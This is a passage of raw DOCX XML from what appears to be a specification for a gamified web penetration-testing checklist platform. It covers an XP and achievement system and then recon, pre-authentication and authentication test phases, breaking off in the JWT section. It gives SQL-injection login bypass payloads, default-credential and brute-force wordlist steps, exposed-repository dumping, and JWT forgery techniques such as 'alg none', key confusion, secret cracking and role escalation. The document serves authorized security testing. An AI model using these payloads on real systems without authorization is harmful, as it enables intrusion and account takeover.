              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0A1628"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">🗺️ THE VAPT NAVIGATOR JOURNEY</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Every testing engagement is a MISSION. The tester is the OPERATIVE. Each phase is a ZONE. Each test case is an OBJECTIVE. Completing objectives earns XP. Reaching milestones unlocks ACHIEVEMENTS.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ZONES: 🔍 RECON → 🚪 PRE-AUTH → 🔑 AUTH → 🏠 POST-AUTH → 🧠 BUSINESS → ⚡ API → 🖥️ CLIENT → 🔒 CRYPTO → 🏗️ INFRA → 🤖 TOOLS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6.2 XP &amp; Level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XP Earned</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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 Case Marked Tested (Pass)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Quick wins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 Case Marked Failed (Finding!)</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Bonus for finding issues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Critical Finding Documented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+200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evidence captured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Phase Completed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 completion bonus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Project Completed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Mission complete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First Finding of the Day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+25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bonus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Testing Streak (5 days)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+150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Streak bonus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Adding Custom Test Case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+75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Knowledge contribution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Peer Review Completed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+30 XP</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Collaboration bonus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6.3 Achievement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First Blood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First vulnerability found in a project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Recon Master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Recon phase with 100% coverage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SQL Slayer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Document a confirmed SQL injection finding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XSS Hunter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Document 3+ XSS findings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Lock Picker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Find an authentication bypass vulnerability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Mission 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100% of applicable test cases in a project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Speed Runner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a full project in under 8 hours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Business Brain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Find a business logic vulnerability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Tool Master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 10+ automated tool tests in one project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On Fire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Find 5+ vulnerabilities in a single testing session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Thorough Tester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Zero "not tested" items at project completion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VAPT Veteran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10 projects on the platform</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6.4 Progress Bar Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TOP of every page: Global mission progress bar (% of applicable test cases completed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Per-phase progress rings — animated Framer Motion circular progress indicators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Real-time updates — progress increments with satisfying animation on each test case action</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Color coding: Gray=Not Started, Blue=In Progress, Green=Pass, Red=Fail, Yellow=NA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Motivational messages change dynamically: "You're 67% through! Only 23 tests left in this zone!"</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6.5 Celebration Moments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Animation &amp; Message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Confetti explosion + "🎉 Zone Complete! You've mastered [Phase Name]!" popup with tester name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First Finding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First Blood! [Tester Name] found a vulnerability!" badge animation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Critical Finding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 pulse animation + "🚨 CRITICAL FINDING by [Name] — Great catch!"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25% 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Quarter way there [Name]! Keep the momentum!"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50% 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Halfway there [Name]! You're on fire!"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75% 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Almost there [Name]! Just 25% left — finish strong!"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100% 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confetti + XP animation + mission complete screen with stats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10 tests in a row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On a roll! 10 tests completed! [Name] is unstoppable!"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Critical Vuln Documented fully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Gold shimmer + "📸 Evidence captured! This finding is bulletproof!"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Test Phase 1 — Reconnaissance &amp; URL Analysis</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RECON ZONE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">This is the FIRST thing a tester does after receiving the URL. The platform guides them through initial discovery before touching the login page. All actions are shown with exact commands and tool outputs to expect.</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7.1 URL Submission &amp; Initial Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Upon entering the target URL, the platform presents the following structured checklist:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1.1 Passive Recon (No Interaction with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What to Do + Expected Output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Technology Fingerprinting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 Wappalyzer browser extension → screenshot tech stack. Check for framework version disclosures.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Headers Analysis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 Burp Suite → Browse to URL → Check Response Headers for: Server, X-Powered-By, X-AspNet-Version, X-Generator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SSL/TLS Analysis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 testssl.sh --full https://target.com | Check version, cipher suites, POODLE, ROBOT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Dorking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Search: site:target.com filetype:pdf OR filetype:xls → Find sensitive documents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Shodan Lookup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Search target IP on shodan.io → Check open ports, exposed services, known vulns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Certificate Transparency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crt.sh for subdomains: https://crt.sh/?q=%.target.com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robots.txt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 to: https://target.com/robots.txt → Document all Disallow entries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sitemap.xml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 to: https://target.com/sitemap.xml → Map all pages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wayback Machine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https://web.archive.org/web/*/target.com for old versions, leaked paths</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7.1.2 Active Recon — Directory &amp; File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1A3C7A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🛠️ TOOL: Directory Busting with ffuf / gobuster / feroxbuster</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Install ffuf</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">go install github.com/ffuf/ffuf/v2@latest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Basic directory busting (SecList wordlist):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ffuf -w /path/to/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://TARGET/FUZZ -mc 200,301,302,403 -o results.json</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API endpoint discovery:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ffuf -w /path/to/SecLists/Discovery/Web-Content/api/api-endpoints.txt -u https://TARGET/FUZZ -mc 200,201,204,301,302 -H "Accept: application/json"</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File extension fuzzing:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ffuf -w /path/to/SecLists/Discovery/Web-Content/raft-medium-files.txt -u https://TARGET/FUZZ -e .php,.asp,.aspx,.jsp,.bak,.old,.config,.env -mc 200</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Gobuster alternative:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">gobuster dir -u https://TARGET -w SecLists/Discovery/Web-Content/common.txt -x php,html,js,txt,config,bak -o gobuster_output.txt</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7.1.3 Force Browsing &amp; Common File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File/Path</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Significance &amp; What to Check</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/.git/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Git repo exposed — run: git-dumper https://target.com/.git output/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/.env</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Environment variables — DB passwords, API keys, secrets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/backup.zip, /backup.tar.gz</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 code backup files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/phpinfo.php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PHP configuration disclosure — versions, paths, settings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/server-status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Apache server status — real-time connection info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/actuator, /actuator/env</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Spring Boot actuator — config, beans, health info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/.DS_Store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macOS directory structure — reveals file paths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/web.config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.NET configuration file — connection strings, settings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/wp-config.php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WordPress config — database credentials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/administrator, /panel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 panel discovery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/api/v1, /api/v2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endpoint root discovery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/swagger, /swagger-ui.html, /api-docs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documentation exposure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/graphql, /graphiql, /playground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GraphQL endpoint exposure</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7.1.4 Nuclei Automated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1A3C7A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🛠️ TOOL: Nuclei — Template-based Vulnerability Scanner</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Install nuclei:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest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Update templates:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">nuclei -update-templates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Run full web scan:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">nuclei -u https://target.com -t ~/nuclei-templates/ -o nuclei_results.txt -severity low,medium,high,critical</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Run specific categories:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">nuclei -u https://target.com -tags ssl,headers,misconfig,exposure,xss,sqli</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Technology detection:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">nuclei -u https://target.com -t technologies/ -t exposures/</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7.1.5 RetireJS / Vulnerable JavaScript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1A3C7A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🛠️ TOOL: RetireJS — JavaScript Vulnerability Detection</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Browser Extension: Install RetireJS from Chrome Web Store → Browse to target → Check for vulnerable JS libs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CLI version:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">npm install -g retire</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">retire --url https://target.com --outputformat json --outputpath retire_results.json</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Check specific JS files:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">retire --js --jsrepo .retire.json /path/to/downloaded/js/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What to look for: jQuery &lt; 3.5.0 (XSS), Angular &lt; 1.6 (XSS), Bootstrap &lt; 3.4.1 (XSS), lodash &lt; 4.17.21 (prototype pollution)</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7.1.6 Burp Suite Setup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Setup Step</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Exact Instructions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Install Extensions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Burp → Extender → BApp Store → Install: Active Scan++, Param Miner, Retire.js, Software Vulnerability Scanner, JWT Editor, Upload Scanner, Backslash Powered Scanner, Turbo Intruder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Proxy Setup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Configure browser proxy: 127.0.0.1:8080 | Install Burp CA cert for HTTPS interception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Scope Configuration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Target → Scope → Add target domain → Check "Use advanced scope control"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Spider/Crawl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Target → Right-click on host → Scan → Crawl (passive) to map all endpoints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Active Scan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Right-click discovered pages → Scan → Active Scan for automated vuln detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Test Phase 2 — Pre-Authentication Testing</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PRE-AUTH ZONE — Testing WITHOUT Logging In</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">This phase tests everything accessible before authentication. Ask: "Are you at the login page/public pages?" → Show all applicable checks.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8.1 Login Page Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspect Element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How to Test &amp; What to Find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Source Code Secrets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F12 → Elements/Sources → Search for: password, secret, api_key, token, config, credential in JS files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Hidden Form Fields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Inspect form → Look for hidden input fields with sensitive values (user IDs, tokens, state)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JavaScript Files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Sources → js/ folder → Look for hardcoded endpoints, credentials, JWT secrets, debug code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Network Tab Leak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F12 → Network → Clear → Load page → Check ALL requests including preflight for sensitive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Console Errors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F12 → Console → Note any errors revealing server info, paths, or stack traces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localStorage Check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F12 → Application → Local Storage → Check for any pre-auth sensitive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Cookie Inspection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F12 → Application → Cookies → Check flags: HttpOnly, Secure, SameSite, expiry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Autocomplete Check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Inspect username/password inputs → Check for: autocomplete="off" — if missing, it's an issue</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Login Page Security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 ID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Test Case + Payload/Method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CAPTCHA Present? → Submit without CAPTCHA, remove CAPTCHA name-value pair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Username Enumeration → Enter valid user + wrong pass, then invalid user → Compare messages &amp; timing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Account Lockout → Attempt 10+ wrong passwords → Check if locked (Burp Intruder: load SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt)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with SQL Injection → Payload: admin'-- | admin'or 1=1-- | 'OR'1'='1</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 in URL → Login → Check if password appears in URL, browser history, server logs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SSL Verification → Check HTTPS enforced, HTTP auto-redirects, HSTS header present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Default Credentials → Try: admin/admin, admin/password, admin/123456, root/root, test/test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Forgot Password Abuse → Request reset for non-existent email → Enumerate valid emails by response diff</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PRE-009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Reset Link Reuse → Get reset link → Use it → Use same link again → Should be expired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PRE-010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Reset Link Expiry → Get reset link → Wait 2+ hours → Try using → Should be expired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PRE-011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Browser Back Button → Login → Logout → Press Back → Should NOT show authenticated page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PRE-012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CSRF on Login → Generate CSRF POC → Submit from external domain → Should be blocked</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8.2 Brute Force Testing — Detailed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1A3C7A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🛠️ TOOL: Burp Intruder — Credential Brute Force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Step 1: Open Burp Suite → Proxy → Intercept → Submit login form</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Step 2: Right-click captured request → Send to Intruder</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Step 3: Intruder → Positions → Clear all → Add § around password value</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Step 4: Attack Type: Sniper</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Step 5: Payloads → Load → SecLists/Passwords/Common-Credentials/best110.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Step 6: Options → Max concurrent requests: 1 (to avoid lockout)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Step 7: Start Attack → Filter by status code and response length difference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For Username Enumeration (Cluster Bomb attack):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Payload 1: SecLists/Usernames/Names/names.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="334155"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Payload 2: SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt</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8.3 SSL/TLS Testing — Full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Tool &amp; Command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TLS Version Check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--protocols https://target.com — Check for SSLv2, SSLv3, TLS 1.0, TLS 1.1 (should be disabled)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Weak Cipher Suites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--cipher-per-proto https://target.com — Look for: RC4, DES, 3DES, EXPORT ciphers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POODLE Attack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--poodle https://target.com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ROBOT Vulnerability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--robot https://target.com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Heartbleed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--heartbleed https://target.com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Forward Secrecy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--fs https://target.com — Should have ECDHE or DHE key exchange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Certificate Validity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expiry date, self-signed, chain completeness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HSTS Header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curl -I https://target.com | grep -i strict — Should be present with includeSubDomains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Mixed Content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Browser console → Check for HTTP resources on HTTPS page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Certificate Pinning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Relevant for APIs — Check if cert bypass is possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Test Phase 3 — Authentication Testing</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AUTH ZONE — Everything About How the App Authenticates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9.1 Session Management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Payload / Method / Tool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Token Entropy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5 times → Compare session tokens in Burp → Sequencer → Check randomness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Fixation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Pre-auth session ID → Login → Check if ID changes → If same: VULNERABLE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After Logout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Logout → Replay old session token request → Should return 401/403</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Concurrent Sessions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on Chrome → Login on Firefox same account → Check if both work (policy issue)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Timeout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 Idle for 15-30 min → Try to use session → Should expire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in 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all URLs for PHPSESSID, JSESSIONID, session_token in query params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Cookie Attributes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Burp → Response headers → Check: HttpOnly, Secure, SameSite=Strict/Lax</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Direct URL Access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Copy post-auth URL → Open in incognito → Should redirect to login</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9.2 JWT Token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none" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFBEB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F59E0B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️ CONDITIONAL: Show only if JWT selected in stack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Payload / Tool / Description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Algorithm None Attack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Base64 decode JWT header → Change "alg": "HS256" to "alg": "none" → Remove signature → Submit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Algorithm Confusion RS256→HS256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If RS256 JWT: Get public key → Re-sign with public key as HMAC secret → Submit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Weak Secret Brute Force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hashcat -a 0 -m 16500 token.jwt SecLists/Passwords/Common-Credentials/best110.txt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Key ID (kid)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Modify kid header to point to /dev/null or inject SQL: "kid": "../../dev/null"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Expiry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Take expired JWT → Modify exp claim → Re-sign → Submit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JWK Header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jwk or jku header pointing to attacker-controlled JWKS endpoint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Role Escalation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Decode payload → Change "role": "user" to "role": "admin" → Re-sign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Burp JWT 